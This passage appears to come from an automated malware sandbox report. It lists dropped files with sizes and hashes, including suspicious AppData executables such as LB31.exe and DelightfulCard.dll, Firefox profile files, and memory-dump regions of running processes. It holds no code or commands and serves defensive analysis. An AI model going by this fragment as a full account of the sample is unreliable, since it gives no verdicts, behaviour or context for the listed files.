                                                                                                              3eaa1ebca8b9ad021342846040faf19c5ef420c319a9a649b31ffb9107b54d71f60f6e4372e0256f123b931f5c3dd11a34ad9c4ccb7d0a3c687a90ba50cd2102

                                                                                                            • C:\Users\Admin\AppData\Roaming\DelightfulCard.dll

                                                                                                              Filesize

                                                                                                              2.6MB

                                                                                                              MD5

                                                                                                              985fef2b6872a1a94726dc3b7f1439de

                                                                                                              SHA1

                                                                                                              e221a5c4f2f222b665c932ab9b1f66189cee3315

                                                                                                              SHA256

                                                                                                              78ef7eacffaba55e653195fe37846375aeb51b164d80ad312afda54163da0622

                                                                                                              SHA512

                                                                                                              41678a3e117cb83e7b99a65a6d0dda86db57ac0441d84ca817d6e04fa3751d4035215e8cd50bcd86b7232d1c28620103264f3a677ac14513d1fa0d977ba94f39

                                                                                                            • C:\Users\Admin\AppData\Roaming\LB31.exe

                                                                                                              Filesize

                                                                                                              7.3MB

                                                                                                              MD5

                                                                                                              c9e6aa21979d5fc710f1f2e8226d9dfe

                                                                                                              SHA1

                                                                                                              d881f97a1fe03f43bed2a9609eae65531cf710cf

                                                                                                              SHA256

                                                                                                              a1a8cfcc74f8f96fd09115189defe07ac6fc2e85a9ff3b3ec9c6f454aede1c1d

                                                                                                              SHA512

                                                                                                              9e90bcb64b0e1f03e05990cdead076b4c6e0b050932ecb953dae50b7e92b823a80fc66d1fd8753591719e89b405757b2bf7518814bc6a19bb745124d1a691627

                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                              Filesize

                                                                                                              7KB

                                                                                                              MD5

                                                                                                              f2fdf3c580b566cc65fbad70dcf59017

                                                                                                              SHA1

                                                                                                              6d842de8d0a5fbeb064eb2295b83554c32e5f63a

                                                                                                              SHA256

                                                                                                              12a88371b80ec3e237b13e81944d474bf94c0b40df4fef8a55c14508bcb8e7e1

                                                                                                              SHA512

                                                                                                              d4b72ca1699d6f3e1dd1c39d812f9b4788e254ef92ba508be294078ca6697ea18404c1c0507ad130c32627972d04607efff4061e5a684c80de3c7db934cd03ca

                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\db\data.safe.bin

                                                                                                              Filesize

                                                                                                              9KB

                                                                                                              MD5

                                                                                                              a75b880f81f25bae4b5749895195b89a

                                                                                                              SHA1

                                                                                                              0d9a584a2b8a765f9c5efffe0320599b20be35f2

                                                                                                              SHA256

                                                                                                              e4f01c823057e48cfc59dac27278ba27220397243e1cb7cb5d996843dbccdaf9

                                                                                                              SHA512

                                                                                                              c0d8f9eda43d02aa8d63acf9de64afd202a64c99d9866601a8a0537f9c4623913d5a558e7dd3e3e50fd7f7df7a74376b192fd0b15350e775c8a73c2efe9c7222

                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\88a94233-6ce6-4e09-ad7d-5df71f6682e7

                                                                                                              Filesize

                                                                                                              733B

                                                                                                              MD5

                                                                                                              9e4ef9c22c608971952eb489d61e4a31

                                                                                                              SHA1

                                                                                                              2129d7dc3dfd7c49ab23ca20424a2a014ab7f2e5

                                                                                                              SHA256

                                                                                                              399e117d55292ca7ee56593cd1faf8e3736325e97206d930ce6e024095ef4240

                                                                                                              SHA512

                                                                                                              061474da139fc2463d7abc2a79511f627f5188208daef85eff76dad29635cae543d5ff159400af2e8d31860a03fc78509243c77c87e0f320dd36c553e146aad1

                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

                                                                                                              Filesize

                                                                                                              997KB

                                                                                                              MD5

                                                                                                              fe3355639648c417e8307c6d051e3e37

                                                                                                              SHA1

                                                                                                              f54602d4b4778da21bc97c7238fc66aa68c8ee34

                                                                                                              SHA256

                                                                                                              1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e

                                                                                                              SHA512

                                                                                                              8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

                                                                                                              Filesize

                                                                                                              116B

                                                                                                              MD5

                                                                                                              3d33cdc0b3d281e67dd52e14435dd04f

                                                                                                              SHA1

                                                                                                              4db88689282fd4f9e9e6ab95fcbb23df6e6485db

                                                                                                              SHA256

                                                                                                              f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b

                                                                                                              SHA512

                                                                                                              a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

                                                                                                              Filesize

                                                                                                              479B

                                                                                                              MD5

                                                                                                              49ddb419d96dceb9069018535fb2e2fc

                                                                                                              SHA1

                                                                                                              62aa6fea895a8b68d468a015f6e6ab400d7a7ca6

                                                                                                              SHA256

                                                                                                              2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539

                                                                                                              SHA512

                                                                                                              48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

                                                                                                              Filesize

                                                                                                              372B

                                                                                                              MD5

                                                                                                              8be33af717bb1b67fbd61c3f4b807e9e

                                                                                                              SHA1

                                                                                                              7cf17656d174d951957ff36810e874a134dd49e0

                                                                                                              SHA256

                                                                                                              e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd

                                                                                                              SHA512

                                                                                                              6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

                                                                                                              Filesize

                                                                                                              11.8MB

                                                                                                              MD5

                                                                                                              33bf7b0439480effb9fb212efce87b13

                                                                                                              SHA1

                                                                                                              cee50f2745edc6dc291887b6075ca64d716f495a

                                                                                                              SHA256

                                                                                                              8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e

                                                                                                              SHA512

                                                                                                              d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

                                                                                                              Filesize

                                                                                                              1KB

                                                                                                              MD5

                                                                                                              688bed3676d2104e7f17ae1cd2c59404

                                                                                                              SHA1

                                                                                                              952b2cdf783ac72fcb98338723e9afd38d47ad8e

                                                                                                              SHA256

                                                                                                              33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

                                                                                                              SHA512

                                                                                                              7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

                                                                                                              Filesize

                                                                                                              1KB

                                                                                                              MD5

                                                                                                              937326fead5fd401f6cca9118bd9ade9

                                                                                                              SHA1

                                                                                                              4526a57d4ae14ed29b37632c72aef3c408189d91

                                                                                                              SHA256

                                                                                                              68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81

                                                                                                              SHA512

                                                                                                              b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs-1.js

                                                                                                              Filesize

                                                                                                              7KB

                                                                                                              MD5

                                                                                                              fe0b2a6ee69e45b45b3f08d81a3680e1

                                                                                                              SHA1

                                                                                                              0b78cad0a6a49869c18105372ac5c35dca61387c

                                                                                                              SHA256

                                                                                                              0c54884afbdd19f4a4b8f763a06734fc8257678e10eb023603123e7637d284b7

                                                                                                              SHA512

                                                                                                              fe2425d49df5040850012cfaba1aee6746cc01a923e85e554941742b82636d0152ba9124446cd533a4f43f02da567e0d88a73b532bb6a89e5a46c6ba2b27878e

                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs-1.js

                                                                                                              Filesize

                                                                                                              7KB

                                                                                                              MD5

                                                                                                              b9c985dce05d6e8cf8bd6ad9dbd0fc8c

                                                                                                              SHA1

                                                                                                              29de07081d8fbfbcaec2c0b117267770457205b4

                                                                                                              SHA256

                                                                                                              9a488b19258ef9caecf3f696d4967a72ed0a7cb512a23bf629cf01b8ba7384bd

                                                                                                              SHA512

                                                                                                              0a1328878042aa99ddec1f6a5acd7a99f7d083c386600667a6c6bc7c66874d904c37e6d4644782e91a0e62692ee9e3efd55705325415aa6f3d7a4de0c98504ad

                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs.js

                                                                                                              Filesize

                                                                                                              6KB

                                                                                                              MD5

                                                                                                              84f9220c6d3429aaa24427384025064b

                                                                                                              SHA1

                                                                                                              5f6094b637a0f27e729a56303d4e9aae265b39aa

                                                                                                              SHA256

                                                                                                              35e07d2814f872b294c656311ee3f3e3195df0eac6e9ca3ad0a00ca905c85d34

                                                                                                              SHA512

                                                                                                              27a60e20fb2f79e050f1101755d694e7ebfb74b705d297604fd979fed127778fcd9a6fcf7def4eff33273f4517cf4f934ce17f875c768a8d5e9ea0215aada63f

                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs.js

                                                                                                              Filesize

                                                                                                              6KB

                                                                                                              MD5

                                                                                                              f0f633c6a564c0ddb28a994170ba7ea1

                                                                                                              SHA1

                                                                                                              48506659639e58d85ffc08842107528972272632

                                                                                                              SHA256

                                                                                                              c79dbef3a94241ca0ff38170097b18a4de5b76864f3f019ee265b4c618b68b37

                                                                                                              SHA512

                                                                                                              6847e473c9a513e100d6b32d3ac72a6efc395ffdd0bf1817bc6a56553b30b7555b1f57ebd674e552fbe2e1fba8b907a5cf5437c552968cb8be4ab0dc46c755d9

                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\sessionstore-backups\recovery.jsonlz4

                                                                                                              Filesize

                                                                                                              4KB

                                                                                                              MD5

                                                                                                              74c007afd64916f21da00a90f80880a9

                                                                                                              SHA1

                                                                                                              6888b5affe7850b5ec8d6dae0e44586d46056b14

                                                                                                              SHA256

                                                                                                              f5f54794e5be0d914f6813d2f25174d6da78ace857c66f297bc32d2d408d1c8d

                                                                                                              SHA512

                                                                                                              317e894cc54c985ebd51566941f6cd8945034ab4a58d2c8feb05e849e16dab68a03568a3bc660d7270099e5cd11a27bfea0db42c5cc8289bb2e284a1488dc0d8

                                                                                                            • \??\PIPE\srvsvc

                                                                                                              MD5

                                                                                                              d41d8cd98f00b204e9800998ecf8427e

                                                                                                              SHA1

                                                                                                              da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                              SHA256

                                                                                                              e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                              SHA512

                                                                                                              cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                            • \Users\Admin\AppData\Local\Temp\is-7D243.tmp\FunnyJellyfish.tmp

                                                                                                              Filesize

                                                                                                              1.1MB

                                                                                                              MD5

                                                                                                              14c6fa8e50b4147075eb922bd0c8b28d

                                                                                                              SHA1

                                                                                                              0faad18b0e26ce3b5c364621a4f0aee9db56a9a7

                                                                                                              SHA256

                                                                                                              90c4a61af494b63ecfe1226714175675a4e49e57d50718491b3bc8fe29dd8fc7

                                                                                                              SHA512

                                                                                                              e6c35bbcaa9a8bb306e58bb91aadf5feed6b1ad1df6ee0e68bf3bae9b76d84c862b4ee9dd87a1d288fe1b7aaaac13467964436a09ec529f67af50905cd0ef876

                                                                                                            • \Users\Admin\AppData\Local\Temp\is-OP2AQ.tmp\_isetup\_shfoldr.dll

                                                                                                              Filesize

                                                                                                              22KB

                                                                                                              MD5

                                                                                                              92dc6ef532fbb4a5c3201469a5b5eb63

                                                                                                              SHA1

                                                                                                              3e89ff837147c16b4e41c30d6c796374e0b8e62c

                                                                                                              SHA256

                                                                                                              9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

                                                                                                              SHA512

                                                                                                              9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

                                                                                                            • memory/432-338-0x00000000379C0000-0x00000000379D0000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/432-335-0x0000000000B90000-0x0000000000BB4000-memory.dmp

                                                                                                              Filesize

                                                                                                              144KB

                                                                                                            • memory/432-333-0x0000000000B90000-0x0000000000BB4000-memory.dmp

                                                                                                              Filesize

                                                                                                              144KB

                                                                                                            • memory/432-337-0x000007FEBF930000-0x000007FEBF940000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/432-336-0x0000000000BC0000-0x0000000000BEB000-memory.dmp

                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/476-344-0x000007FEBF930000-0x000007FEBF940000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/476-345-0x00000000379C0000-0x00000000379D0000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/476-343-0x00000000001E0000-0x000000000020B000-memory.dmp

                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/492-350-0x00000000000C0000-0x00000000000EB000-memory.dmp

                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/592-55-0x00000000004E0000-0x00000000004E6000-memory.dmp

                                                                                                              Filesize

                                                                                                              24KB

                                                                                                            • memory/592-54-0x0000000000A60000-0x0000000000A72000-memory.dmp

                                                                                                              Filesize

                                                                                                              72KB

                                                                                                            • memory/764-265-0x000000001CC20000-0x000000001D71F000-memory.dmp

                                                                                                              Filesize

                                                                                                              11.0MB

                                                                                                            • memory/764-83-0x0000000002790000-0x0000000002798000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/764-82-0x000000001B620000-0x000000001B902000-memory.dmp

                                                                                                              Filesize

                                                                                                              2.9MB

                                                                                                            • memory/1056-155-0x0000000000400000-0x0000000000528000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.2MB

                                                                                                            • memory/1324-305-0x0000000001CE0000-0x0000000001CE8000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/1324-304-0x000000001B760000-0x000000001BA42000-memory.dmp

                                                                                                              Filesize

                                                                                                              2.9MB

                                                                                                            • memory/1348-593-0x000000013F7C0000-0x00000001402BF000-memory.dmp

                                                                                                              Filesize

                                                                                                              11.0MB

                                                                                                            • memory/1348-267-0x000000013F7C0000-0x00000001402BF000-memory.dmp

                                                                                                              Filesize

                                                                                                              11.0MB

                                                                                                            • memory/1436-163-0x0000000000A20000-0x0000000000ECD000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.7MB

                                                                                                            • memory/1436-164-0x0000000000A20000-0x0000000000ECD000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.7MB

                                                                                                            • memory/1436-220-0x0000000000A20000-0x0000000000ECD000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.7MB

                                                                                                            • memory/1436-39-0x0000000000A20000-0x0000000000ECD000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.7MB

                                                                                                            • memory/1980-242-0x0000000001330000-0x0000000001F70000-memory.dmp

                                                                                                              Filesize

                                                                                                              12.2MB

                                                                                                            • memory/1980-1393-0x0000000001330000-0x0000000001F70000-memory.dmp

                                                                                                              Filesize

                                                                                                              12.2MB

                                                                                                            • memory/1980-269-0x0000000001330000-0x0000000001F70000-memory.dmp

                                                                                                              Filesize

                                                                                                              12.2MB

                                                                                                            • memory/1980-320-0x0000000001330000-0x0000000001F70000-memory.dmp

                                                                                                              Filesize

                                                                                                              12.2MB

                                                                                                            • memory/1980-288-0x0000000069CC0000-0x000000006A71B000-memory.dmp

                                                                                                              Filesize

                                                                                                              10.4MB

                                                                                                            • memory/2180-6-0x0000000000260000-0x0000000000730000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/2180-16-0x0000000000260000-0x0000000000730000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/2180-0-0x0000000000260000-0x0000000000730000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/2180-4-0x0000000000260000-0x0000000000730000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/2180-3-0x0000000000260000-0x0000000000730000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/2180-2-0x0000000000261000-0x000000000028F000-memory.dmp

                                                                                                              Filesize

                                                                                                              184KB

                                                                                                            • memory/2180-1-0x0000000077B70000-0x0000000077B72000-memory.dmp

                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/2272-68-0x00000000023C0000-0x00000000023C8000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/2272-67-0x000000001B700000-0x000000001B9E2000-memory.dmp

                                                                                                              Filesize

                                                                                                              2.9MB

                                                                                                            • memory/2412-327-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/2412-330-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/2412-324-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/2412-323-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/2412-322-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/2412-328-0x0000000077980000-0x0000000077B29000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.7MB

                                                                                                            • memory/2412-329-0x0000000077860000-0x000000007797F000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.1MB

                                                                                                            • memory/2412-325-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/2480-74-0x0000000002CA0000-0x0000000002CBA000-memory.dmp

                                                                                                              Filesize

                                                                                                              104KB

                                                                                                            • memory/2536-134-0x0000000000400000-0x000000000042D000-memory.dmp

                                                                                                              Filesize

                                                                                                              180KB

                                                                                                            • memory/2536-156-0x0000000000400000-0x000000000042D000-memory.dmp

                                                                                                              Filesize

                                                                                                              180KB

                                                                                                            • memory/2588-321-0x00000000069D0000-0x0000000006E88000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.7MB

                                                                                                            • memory/2588-19-0x0000000000930000-0x0000000000E00000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/2588-69-0x0000000000930000-0x0000000000E00000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/2588-18-0x0000000000931000-0x000000000095F000-memory.dmp

                                                                                                              Filesize

                                                                                                              184KB

                                                                                                            • memory/2588-268-0x0000000000930000-0x0000000000E00000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/2588-256-0x00000000069D0000-0x0000000006E88000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.7MB

                                                                                                            • memory/2588-278-0x00000000069D0000-0x0000000007610000-memory.dmp

                                                                                                              Filesize

                                                                                                              12.2MB

                                                                                                            • memory/2588-21-0x0000000000930000-0x0000000000E00000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/2588-22-0x0000000000930000-0x0000000000E00000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/2588-240-0x00000000069D0000-0x0000000007610000-memory.dmp

                                                                                                              Filesize

                                                                                                              12.2MB

                                                                                                            • memory/2588-266-0x00000000069D0000-0x0000000007610000-memory.dmp

                                                                                                              Filesize

                                                                                                              12.2MB

                                                                                                            • memory/2588-131-0x00000000069D0000-0x0000000006E7D000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.7MB

                                                                                                            • memory/2588-192-0x0000000000930000-0x0000000000E00000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/2588-286-0x00000000069D0000-0x000000000707E000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/2588-1152-0x00000000069D0000-0x000000000707E000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/2588-17-0x0000000000930000-0x0000000000E00000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/2588-38-0x0000000000930000-0x0000000000E00000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/2588-243-0x00000000069D0000-0x0000000007610000-memory.dmp

                                                                                                              Filesize

                                                                                                              12.2MB

                                                                                                            • memory/2588-36-0x00000000069D0000-0x0000000006E7D000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.7MB

                                                                                                            • memory/2588-23-0x0000000000930000-0x0000000000E00000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/2700-103-0x0000000000400000-0x000000000042D000-memory.dmp

                                                                                                              Filesize

                                                                                                              180KB

                                                                                                            • memory/2700-159-0x0000000000400000-0x000000000042D000-memory.dmp

                                                                                                              Filesize

                                                                                                              180KB

                                                                                                            • memory/2704-157-0x0000000000400000-0x0000000000528000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.2MB

                                                                                                            • memory/2772-1008-0x00000000003C0000-0x0000000000878000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.7MB

                                                                                                            • memory/2772-258-0x00000000003C0000-0x0000000000878000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.7MB

                                                                                                            • memory/2772-569-0x00000000003C0000-0x0000000000878000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.7MB

                                                                                                            • memory/2836-130-0x00000000009B0000-0x00000000009C8000-memory.dmp

                                                                                                              Filesize

                                                                                                              96KB

                                                                                                            • memory/2876-297-0x0000000001120000-0x00000000017CE000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/3164-1151-0x0000000001110000-0x00000000013BA000-memory.dmp

                                                                                                              Filesize

                                                                                                              2.7MB

                                                                                                            • memory/3164-1150-0x0000000001110000-0x00000000013BA000-memory.dmp

                                                                                                              Filesize

                                                                                                              2.7MB

                                                                                                            • memory/4048-640-0x000000001A150000-0x000000001A432000-memory.dmp

                                                                                                              Filesize

                                                                                                              2.9MB

                                                                                                            • memory/4048-641-0x00000000009A0000-0x00000000009A8000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB